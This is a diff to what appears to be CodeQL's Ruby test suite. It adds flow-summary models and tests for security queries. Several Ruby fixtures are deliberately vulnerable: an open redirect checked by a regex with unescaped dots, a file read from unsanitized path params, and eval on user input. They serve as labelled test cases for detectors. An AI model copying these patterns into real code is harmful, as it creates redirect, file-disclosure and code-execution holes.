+ * Lists every warning returned by `ModelOutput::getAWarning`, so that
+ * rejected model rows show up in the test output.
+ */
+query predicate warning = ModelOutput::getAWarning/0;
+
 query predicate invalidOutputSpecComponent(SummarizedCallable sc, AccessPath s, AccessPathToken c) {
  sc.propagatesFlowExt(_, s, _) and
  c = s.getToken(_) and
@@ -64,6 +67,51 @@ private class SummarizedCallableApplyLambda extends SummarizedCallable {
  }
 }

+/**
+ * Flow summaries for this test, supplied as models-as-data CSV rows.
+ *
+ * Every row ends in an access path to a method, followed by the input, the
+ * output and the kind of flow (always `taint` here). The two leading columns
+ * are either empty or `any`; presumably they select where the path is rooted -
+ * confirm against `ModelsAsData.qll`.
+ *
+ * The modelled methods are called from `summaries.rb`.
+ */
+private class StepsFromModel extends ModelInput::SummaryModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        ";;Member[Foo].Method[firstArg];Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[secondArg];Argument[1];ReturnValue;taint",
+        ";;Member[Foo].Method[onlyWithoutBlock].WithoutBlock;Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[onlyWithBlock].WithBlock;Argument[0];ReturnValue;taint",
+        ";;Member[Foo].Method[blockArg].BlockArgument.Parameter[0].Method[preserveTaint];Argument[0];ReturnValue;taint",
+        ";any;Method[matchedByName];Argument[0];ReturnValue;taint",
+        ";any;Method[matchedByNameRcv];Receiver;ReturnValue;taint",
+      ]
+  }
+}
+
+/**
+ * Type rows for this test, each with five `;`-separated columns.
+ *
+ * They give three access paths for `test;FooOrBar`: `Member[Foo].Instance`,
+ * `Member[Bar].Instance`, and `Method[next].ReturnValue` starting from a
+ * `test;FooOrBar` value itself (so chains of `next` calls stay in the type).
+ * `SinkFromModel` refers to this type.
+ */
+private class TypeFromModel extends ModelInput::TypeModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "test;FooOrBar;;;Member[Foo].Instance", //
+        "test;FooOrBar;;;Member[Bar].Instance", //
+        "test;FooOrBar;test;FooOrBar;Method[next].ReturnValue",
+      ]
+  }
+}
+
+/**
+ * Deliberately malformed type rows.
+ *
+ * Each row is expected to produce one entry in the `warning` output of this
+ * test: a wrong column count, an unknown token name (`Arg`), invalid
+ * `Argument` arguments (`0-1`, `*`), or a token that is missing its arguments.
+ */
+private class InvalidTypeModel extends ModelInput::TypeModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "test;TooManyColumns;;;Member[Foo].Instance;too;many;columns", //
+        "test;TooFewColumns", //
+        "test;X;test;Y;Method[foo].Arg[0]", //
+        "test;X;test;Y;Method[foo].Argument[0-1]", //
+        "test;X;test;Y;Method[foo].Argument[*]", //
+        "test;X;test;Y;Method[foo].Argument", //
+        "test;X;test;Y;Method[foo].Member", //
+      ]
+  }
+}
+
+/**
+ * Declares argument 0 of a `method` call on a `test;FooOrBar` value as a sink
+ * of kind `test-sink`. `Conf` picks these sinks up through
+ * `ModelOutput::getASinkNode("test-sink")`.
+ */
+private class SinkFromModel extends ModelInput::SinkModelCsv {
+  override predicate row(string row) { row = "test;FooOrBar;Method[method].Argument[0];test-sink" }
+}
+
 class Conf extends TaintTracking::Configuration {
  Conf() { this = "FlowSummaries" }

@@ -76,6 +124,8 @@ class Conf extends TaintTracking::Configuration {
      mc.getMethodName() = "sink" and
      mc.getAnArgument() = sink.asExpr().getExpr()
    )
+    or
+    sink = ModelOutput::getASinkNode("test-sink").getARhs()
  }
 }

--- a/ruby/ql/test/library-tests/dataflow/summaries/summaries.rb
+++ b/ruby/ql/test/library-tests/dataflow/summaries/summaries.rb
@@ -16,3 +16,34 @@ my_lambda = -> (x) {
 tainted3 = apply_lambda(my_lambda, tainted)

 sink(tainted3)
+
+tainted4 = Foo.firstArg(tainted)
+sink(tainted4)
+
+notTainted = Foo.firstArg(nil, tainted) # taint is passed as argument 1; only Argument[0] is modelled, so no flow is expected
+sink(notTainted)
+
+tainted5 = Foo.secondArg(nil, tainted)
+sink(tainted5)
+
+sink(Foo.onlyWithBlock(tainted))
+sink(Foo.onlyWithBlock(tainted) do |x| end)
+sink(Foo.onlyWithoutBlock(tainted))
+sink(Foo.onlyWithoutBlock(tainted) do |x| end)
+
+Foo.new.method(tainted)
+Bar.new.method(tainted)
+Bar.new.next.method(tainted)
+Bar.new.next.next.next.next.method(tainted)
+
+def userDefinedFunction(x, y) # x and y have no known type: exercises the models that match by method name only
+  t = "taint"
+  sink(x.matchedByName(t)) # flow expected: Argument[0] -> ReturnValue
+  sink(y.matchedByName(t)) # flow expected: same model, different receiver
+  sink(x.unmatchedName(t)) # no model for this method name, so no flow expected
+  sink(t.matchedByNameRcv()) # flow expected: Receiver -> ReturnValue
+end
+
+Foo.blockArg do |x|
+  sink(x.preserveTaint("taint"))
+end
--- a/ruby/ql/test/library-tests/regexp/regexp.expected
+++ b/ruby/ql/test/library-tests/regexp/regexp.expected
@@ -6,11 +6,8 @@ groupNumber
 | regexp.rb:46:2:46:6 | (foo) | 1 |
 | regexp.rb:47:4:47:8 | (o\|b) | 1 |
 | regexp.rb:48:2:48:9 | (a\|b\|cd) | 1 |
-| regexp.rb:49:2:49:7 | (?::+) | 1 |
-| regexp.rb:52:2:52:11 | (?<id>\\w+) | 1 |
 | regexp.rb:53:2:53:12 | (?'foo'fo+) | 1 |
 | regexp.rb:56:2:56:5 | (a+) | 1 |
-| regexp.rb:57:2:57:11 | (?<qux>q+) | 1 |
 term
 | regexp.rb:5:2:5:4 | abc | RegExpConstant,RegExpNormalChar |
 | regexp.rb:8:2:8:2 | a | RegExpConstant,RegExpNormalChar |
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.expected
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.expected
@@ -0,0 +1,28 @@
+| hosttest.rb:1:18:1:41 | (www\|beta).example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | hosttest.rb:1:17:1:42 | /(www\|beta).example.com\\// | here |
+| hosttest.rb:2:33:2:55 | (www\|beta).example.com/ | This regular expression has an unescaped '.' before 'example.com/', so it might match more hosts than expected. | hosttest.rb:2:32:2:56 | "(www\|beta).example.com/" | here |
+| hosttest.rb:3:29:3:51 | (www\|beta).example.com/ | This regular expression has an unescaped '.' before 'example.com/', so it might match more hosts than expected. | hosttest.rb:3:28:3:52 | "(www\|beta).example.com/" | here |
+| tst-IncompleteHostnameRegExp.rb:3:3:3:28 | ^http:\\/\\/test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:3:2:3:29 | /^http:\\/\\/test.example.com/ | here |
+| tst-IncompleteHostnameRegExp.rb:5:3:5:28 | ^http:\\/\\/test.example.net | This regular expression has an unescaped '.' before 'example.net', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:5:2:5:29 | /^http:\\/\\/test.example.net/ | here |
+| tst-IncompleteHostnameRegExp.rb:6:3:6:42 | ^http:\\/\\/test.(example-a\|example-b).com | This regular expression has an unescaped '.' before '(example-a\|example-b).com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:6:2:6:43 | /^http:\\/\\/test.(example-a\|exa.../ | here |
+| tst-IncompleteHostnameRegExp.rb:7:3:7:30 | ^http:\\/\\/(.+).example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:7:2:7:31 | /^http:\\/\\/(.+).example.com\\// | here |
+| tst-IncompleteHostnameRegExp.rb:7:3:7:30 | ^http:\\/\\/(.+).example.com\\/ | This regular expression has an unrestricted wildcard '.+' which may cause 'example.com' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:7:2:7:31 | /^http:\\/\\/(.+).example.com\\// | here |
+| tst-IncompleteHostnameRegExp.rb:9:3:9:39 | ^http:\\/\\/(?:.+)\\.test\\.example.com\\/ | This regular expression has an unrestricted wildcard '.+' which may cause 'example.com' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:9:2:9:40 | /^http:\\/\\/(?:.+)\\.test\\.examp.../ | here |
+| tst-IncompleteHostnameRegExp.rb:10:3:10:36 | ^http:\\/\\/test.example.com\\/(?:.*) | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:10:2:10:37 | /^http:\\/\\/test.example.com\\/(.../ | here |
+| tst-IncompleteHostnameRegExp.rb:11:14:11:37 | ^http://test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:11:13:11:38 | "^http://test.example.com" | here |
+| tst-IncompleteHostnameRegExp.rb:12:15:12:38 | ^http://test.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:12:14:12:39 | "^http://test.example.com" | here |
+| tst-IncompleteHostnameRegExp.rb:15:23:15:46 | ^http://test.example.com | This string, which is used as a regular expression $@, has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:15:13:15:50 | call to id | here |
+| tst-IncompleteHostnameRegExp.rb:17:14:17:30 | test.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:17:13:17:31 | `test.example.com$` | here |
+| tst-IncompleteHostnameRegExp.rb:19:14:19:30 | ^test.example.com | This string, which is used as a regular expression $@, has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:20:13:20:26 | "#{...}$" | here |
+| tst-IncompleteHostnameRegExp.rb:20:14:20:31 | ^test.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:20:13:20:26 | "#{...}$" | here |
+| tst-IncompleteHostnameRegExp.rb:37:3:37:53 | ^(https?:)?\\/\\/((service\|www).)?example.com(?=$\|\\/) | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:37:2:37:54 | /^(https?:)?\\/\\/((service\|www).../ | here |
+| tst-IncompleteHostnameRegExp.rb:38:3:38:43 | ^(http\|https):\\/\\/www.example.com\\/p\\/f\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:38:2:38:44 | /^(http\|https):\\/\\/www.example.../ | here |
+| tst-IncompleteHostnameRegExp.rb:39:5:39:30 | http:\\/\\/sub.example.com\\/ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:39:2:39:33 | /^(http:\\/\\/sub.example.com\\/)/ | here |
+| tst-IncompleteHostnameRegExp.rb:40:3:40:29 | ^https?:\\/\\/api.example.com | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:40:2:40:30 | /^https?:\\/\\/api.example.com/ | here |
+| tst-IncompleteHostnameRegExp.rb:41:42:41:68 | ^https?://.+\\.example\\.com/ | This string, which is used as a regular expression $@, has an unrestricted wildcard '.+' which may cause 'example\\.com/' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:41:13:41:71 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:43:3:43:32 | ^https:\\/\\/[a-z]*.example.com$ | This regular expression has an unescaped '.' before 'example.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:43:2:43:33 | /^https:\\/\\/[a-z]*.example.com$/ | here |
+| tst-IncompleteHostnameRegExp.rb:44:40:44:53 | .+.example.net | This regular expression has an unescaped '.' before 'example.net', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:44:55:44:70 | .+.example-a.com | This regular expression has an unescaped '.' before 'example-a.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:44:72:44:87 | .+.example-b.com | This regular expression has an unescaped '.' before 'example-b.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:44:17:44:109 | "^protos?://(localhost\|.+.exam..." | here |
+| tst-IncompleteHostnameRegExp.rb:48:42:48:67 | ^https?://.+.example\\.com/ | This string, which is used as a regular expression $@, has an unescaped '.' before 'example\\.com/', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:48:13:48:69 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:48:42:48:67 | ^https?://.+.example\\.com/ | This string, which is used as a regular expression $@, has an unrestricted wildcard '.+' which may cause 'example\\.com/' to be matched anywhere in the URL, outside the hostname. | tst-IncompleteHostnameRegExp.rb:48:13:48:69 | ... + ... | here |
+| tst-IncompleteHostnameRegExp.rb:59:5:59:20 | foo.example\\.com | This regular expression has an unescaped '.' before 'example\\.com', so it might match more hosts than expected. | tst-IncompleteHostnameRegExp.rb:59:2:59:32 | /^(foo.example\\.com\|whatever)$/ | here |
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref
@@ -0,0 +1 @@
+queries/security/cwe-020/IncompleteHostnameRegExp.ql
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb
@@ -0,0 +1,22 @@
+UNSAFE_REGEX1 = /(www|beta).example.com\//
+UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/")
+UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/")
+SAFE_REGEX = /(www|beta)\.example\.com\//
+
+def unsafe # redirects when the target matches UNSAFE_REGEX1, whose '.' characters are unescaped
+    target = params[:target]
+    if UNSAFE_REGEX1.match(target)
+        redirect_to target
+    end
+end
+
+def safe # redirects when the target matches SAFE_REGEX, whose '.' characters are escaped
+    target = params[:target]
+    if SAFE_REGEX.match(target)
+        redirect_to target
+    end
+end
+
+# FP reported in https://github.com/github/codeql/issues/3712
+# This does not define a regex (but could be used by other code to do so)
+escaped = Regexp::escape("https://www.humblebundle.com/home/library")
--- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb
+++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb
@@ -0,0 +1,67 @@
+def foo # each pattern is annotated OK / NOT OK to record whether it should be flagged
+	/^http:\/\/example.com/; # OK
+	/^http:\/\/test.example.com/; # NOT OK
+	/^http:\/\/test\.example.com/; # OK
+	/^http:\/\/test.example.net/; # NOT OK
+	/^http:\/\/test.(example-a|example-b).com/; # NOT OK
+	/^http:\/\/(.+).example.com\//; # NOT OK
+	/^http:\/\/(\.+)\.example.com/; # OK
+	/^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK
+	/^http:\/\/test.example.com\/(?:.*)/; # NOT OK - unescaped '.' before example.com (the trailing wildcard itself is fine)
+	Regexp.new("^http://test.example.com"); # NOT OK
+	if (s.match("^http://test.example.com")); end # NOT OK
+
+
+	Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK
+
+	Regexp.new(`test.example.com$`); # NOT OK
+
+	hostname = '^test.example.com'; # NOT OK
+	Regexp.new("#{hostname}$");
+
+	domain = { hostname: 'test.example.com$' }; # NOT OK, but not detected
+	Regexp.new(domain[:hostname]);
+
+
+
+
+	convert1({ hostname: 'test.example.com$' }); # NOT OK, but not detected
+
+	domains = [ { hostname: 'test.example.com$' } ];  # NOT OK, but not detected
+
+
+
+	domains.map{ |d| convert2(d) };
+
+	/^(.+\.(?:example-a|example-b)\.com)\//; # NOT OK, but not detected
+	/^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK
+	/^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK
+	/^(http:\/\/sub.example.com\/)/i; # NOT OK
+	/^https?:\/\/api.example.com/; # NOT OK
+	Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK
+	Regexp.new("^http[s]?:\/\/?sub1\\.sub2\\.example\\.com\/f\/(.+)"); # NOT OK
+	/^https:\/\/[a-z]*.example.com$/; # NOT OK
+	Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK
+
+	/^(example.dev|example.com)/; # OK
+
+	Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK
+
+	primary = 'example.com$';
+	Regexp.new('test.' + primary); # NOT OK, but not detected
+
+	Regexp.new('test.' + 'example.com$'); # NOT OK, but not detected
+
+	Regexp.new('^http://test\.example.com'); # OK - a single-quoted string keeps the backslash, so the '.' is escaped
+
+	/^http:\/\/(..|...)\.example\.com\/index\.html/; # OK, wildcards are intentional
+	/^http:\/\/.\.example\.com\/index\.html/; # OK, the wildcard is intentional
+	/^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname
+end
+def id(e); return e; end # identity helper: `foo` passes a pattern string through nested calls to it
+def convert1(domain) # builds a Regexp from the :hostname entry of the given hash
+	return Regexp.new(domain[:hostname]);
+end
+def convert2(domain) # same as convert1; `foo` calls it once per element of an array of hashes
+	return Regexp.new(domain[:hostname]);
+end
--- a/ruby/ql/test/query-tests/security/cwe-022/PathInjection.expected
+++ b/ruby/ql/test/query-tests/security/cwe-022/PathInjection.expected
@@ -22,6 +22,9 @@ edges
 | tainted_path.rb:47:12:47:63 | call to join :  | tainted_path.rb:48:26:48:29 | path |
 | tainted_path.rb:47:43:47:48 | call to params :  | tainted_path.rb:47:43:47:55 | ...[...] :  |
 | tainted_path.rb:47:43:47:55 | ...[...] :  | tainted_path.rb:47:12:47:63 | call to join :  |
+| tainted_path.rb:59:12:59:53 | call to new :  | tainted_path.rb:60:26:60:29 | path |
+| tainted_path.rb:59:40:59:45 | call to params :  | tainted_path.rb:59:40:59:52 | ...[...] :  |
+| tainted_path.rb:59:40:59:52 | ...[...] :  | tainted_path.rb:59:12:59:53 | call to new :  |
 nodes
 | tainted_path.rb:4:12:4:17 | call to params :  | semmle.label | call to params :  |
 | tainted_path.rb:4:12:4:24 | ...[...] :  | semmle.label | ...[...] :  |
@@ -54,6 +57,10 @@ nodes
 | tainted_path.rb:47:43:47:48 | call to params :  | semmle.label | call to params :  |
 | tainted_path.rb:47:43:47:55 | ...[...] :  | semmle.label | ...[...] :  |
 | tainted_path.rb:48:26:48:29 | path | semmle.label | path |
+| tainted_path.rb:59:12:59:53 | call to new :  | semmle.label | call to new :  |
+| tainted_path.rb:59:40:59:45 | call to params :  | semmle.label | call to params :  |
+| tainted_path.rb:59:40:59:52 | ...[...] :  | semmle.label | ...[...] :  |
+| tainted_path.rb:60:26:60:29 | path | semmle.label | path |
 subpaths
 #select
 | tainted_path.rb:5:26:5:29 | path | tainted_path.rb:4:12:4:17 | call to params :  | tainted_path.rb:5:26:5:29 | path | This path depends on $@. | tainted_path.rb:4:12:4:17 | call to params | a user-provided value |
@@ -64,3 +71,4 @@ subpaths
 | tainted_path.rb:35:26:35:29 | path | tainted_path.rb:34:29:34:34 | call to params :  | tainted_path.rb:35:26:35:29 | path | This path depends on $@. | tainted_path.rb:34:29:34:34 | call to params | a user-provided value |
 | tainted_path.rb:41:26:41:29 | path | tainted_path.rb:40:26:40:31 | call to params :  | tainted_path.rb:41:26:41:29 | path | This path depends on $@. | tainted_path.rb:40:26:40:31 | call to params | a user-provided value |
 | tainted_path.rb:48:26:48:29 | path | tainted_path.rb:47:43:47:48 | call to params :  | tainted_path.rb:48:26:48:29 | path | This path depends on $@. | tainted_path.rb:47:43:47:48 | call to params | a user-provided value |
+| tainted_path.rb:60:26:60:29 | path | tainted_path.rb:59:40:59:45 | call to params :  | tainted_path.rb:60:26:60:29 | path | This path depends on $@. | tainted_path.rb:59:40:59:45 | call to params | a user-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-022/tainted_path.rb
+++ b/ruby/ql/test/query-tests/security/cwe-022/tainted_path.rb
@@ -54,8 +54,14 @@ class FooController < ActionController::Base
    @content = File.read path
  end

-  # GOOD - explicitly sanitized
+  # BAD
  def route9
+    path = ActiveStorage::Filename.new(params[:path])
+    @content = File.read path
+  end
+
+  # GOOD - explicitly sanitized
+  def route10
    path = ActiveStorage::Filename.new(params[:path]).sanitized
    @content = File.read path
  end
--- a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected
+++ b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected
@@ -5,6 +5,8 @@ edges
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:21:21:21:24 | code |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:27:15:27:18 | code |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:30:19:30:22 | code |
+| CodeInjection.rb:3:12:3:24 | ...[...] :  | CodeInjection.rb:36:24:36:27 | code :  |
+| CodeInjection.rb:36:24:36:27 | code :  | CodeInjection.rb:36:10:36:28 | call to escape |
 nodes
 | CodeInjection.rb:3:12:3:17 | call to params :  | semmle.label | call to params :  |
 | CodeInjection.rb:3:12:3:24 | ...[...] :  | semmle.label | ...[...] :  |
@@ -14,6 +16,8 @@ nodes
 | CodeInjection.rb:21:21:21:24 | code | semmle.label | code |
 | CodeInjection.rb:27:15:27:18 | code | semmle.label | code |
 | CodeInjection.rb:30:19:30:22 | code | semmle.label | code |
+| CodeInjection.rb:36:10:36:28 | call to escape | semmle.label | call to escape |
+| CodeInjection.rb:36:24:36:27 | code :  | semmle.label | code :  |
 subpaths
 #select
 | CodeInjection.rb:6:10:6:13 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:6:10:6:13 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
@@ -22,3 +26,4 @@ subpaths
 | CodeInjection.rb:21:21:21:24 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:21:21:21:24 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
 | CodeInjection.rb:27:15:27:18 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:27:15:27:18 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
 | CodeInjection.rb:30:19:30:22 | code | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:30:19:30:22 | code | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
+| CodeInjection.rb:36:10:36:28 | call to escape | CodeInjection.rb:3:12:3:17 | call to params :  | CodeInjection.rb:36:10:36:28 | call to escape | This code execution depends on $@. | CodeInjection.rb:3:12:3:17 | call to params | a user-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb
+++ b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb
@@ -31,6 +31,9 @@ class UsersController < ActionController::Base
    
    # GOOD
    Bar.const_get(code)
+
+    # BAD
+    eval(Regexp.escape(code))
  end

  def update
--- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter.expected
+++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter.expected
@@ -11,4 +11,4 @@
 | test.rb:15:6:15:39 | <script[^>]*?>[\\s\\S]*?<\\/script.*> | This regular expression does not match script end tags like </script\\t\\n bar>. |
 | test.rb:17:6:17:40 | <script\\b[^>]*>([\\s\\S]*?)<\\/script> | This regular expression does not match script end tags like </script >. |
 | test.rb:18:6:18:48 | <(?:!--([\\S\|\\s]*?)-->)\|([^\\/\\s>]+)[\\S\\s]*?> | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 1 and comments ending with --!> are matched with capture group 2. |
-| test.rb:19:6:19:147 | <(?:(?:\\/([^>]+)>)\|(?:!--([\\S\|\\s]*?)-->)\|(?:([^\\/\\s>]+)((?:\\s+[\\w\\-:.]+(?:\\s*=\\s*?(?:(?:"[^"]*")\|(?:'[^']*')\|[^\\s"'\\/>]+))?)*)[\\S\\s]*?(\\/?)>)) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 2 and comments ending with --!> are matched with capture group 1, 3, 4, 5. |
+| test.rb:19:6:19:147 | <(?:(?:\\/([^>]+)>)\|(?:!--([\\S\|\\s]*?)-->)\|(?:([^\\/\\s>]+)((?:\\s+[\\w\\-:.]+(?:\\s*=\\s*?(?:(?:"[^"]*")\|(?:'[^']*')\|[^\\s"'\\/>]+))?)*)[\\S\\s]*?(\\/?)>)) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 2 and comments ending with --!> are matched with capture group 3, 4. |
--- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected
+++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected
@@ -0,0 +1,52 @@
+edges
+| tainted_format_string.rb:4:12:4:17 | call to params :  | tainted_format_string.rb:4:12:4:26 | ...[...] |
+| tainted_format_string.rb:5:19:5:24 | call to params :  | tainted_format_string.rb:5:19:5:33 | ...[...] |
+| tainted_format_string.rb:10:23:10:28 | call to params :  | tainted_format_string.rb:10:23:10:37 | ...[...] |
+| tainted_format_string.rb:11:30:11:35 | call to params :  | tainted_format_string.rb:11:30:11:44 | ...[...] |
+| tainted_format_string.rb:18:23:18:28 | call to params :  | tainted_format_string.rb:18:23:18:37 | ...[...] |
+| tainted_format_string.rb:19:30:19:35 | call to params :  | tainted_format_string.rb:19:30:19:44 | ...[...] |
+| tainted_format_string.rb:21:27:21:32 | call to params :  | tainted_format_string.rb:21:27:21:41 | ...[...] |
+| tainted_format_string.rb:22:20:22:25 | call to params :  | tainted_format_string.rb:22:20:22:34 | ...[...] |
+| tainted_format_string.rb:28:19:28:24 | call to params :  | tainted_format_string.rb:28:19:28:33 | ...[...] |
+| tainted_format_string.rb:33:32:33:37 | call to params :  | tainted_format_string.rb:33:32:33:46 | ...[...] :  |
+| tainted_format_string.rb:33:32:33:46 | ...[...] :  | tainted_format_string.rb:33:12:33:46 | ... + ... |
+| tainted_format_string.rb:36:30:36:35 | call to params :  | tainted_format_string.rb:36:30:36:44 | ...[...] :  |
+| tainted_format_string.rb:36:30:36:44 | ...[...] :  | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" |
+nodes
+| tainted_format_string.rb:4:12:4:17 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:4:12:4:26 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:5:19:5:24 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:5:19:5:33 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:10:23:10:28 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:10:23:10:37 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:11:30:11:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:11:30:11:44 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:18:23:18:28 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:18:23:18:37 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:19:30:19:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:19:30:19:44 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:21:27:21:32 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:21:27:21:41 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:22:20:22:25 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:22:20:22:34 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:28:19:28:24 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:28:19:28:33 | ...[...] | semmle.label | ...[...] |
+| tainted_format_string.rb:33:12:33:46 | ... + ... | semmle.label | ... + ... |
+| tainted_format_string.rb:33:32:33:37 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:33:32:33:46 | ...[...] :  | semmle.label | ...[...] :  |
+| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | semmle.label | "A log message: #{...}" |
+| tainted_format_string.rb:36:30:36:35 | call to params :  | semmle.label | call to params :  |
+| tainted_format_string.rb:36:30:36:44 | ...[...] :  | semmle.label | ...[...] :  |
+subpaths
+#select
+| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params :  | tainted_format_string.rb:4:12:4:26 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:4:12:4:17 | call to params | User-provided value |
+| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params :  | tainted_format_string.rb:5:19:5:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:5:19:5:24 | call to params | User-provided value |
+| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params :  | tainted_format_string.rb:10:23:10:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:10:23:10:28 | call to params | User-provided value |
+| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params :  | tainted_format_string.rb:11:30:11:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:11:30:11:35 | call to params | User-provided value |
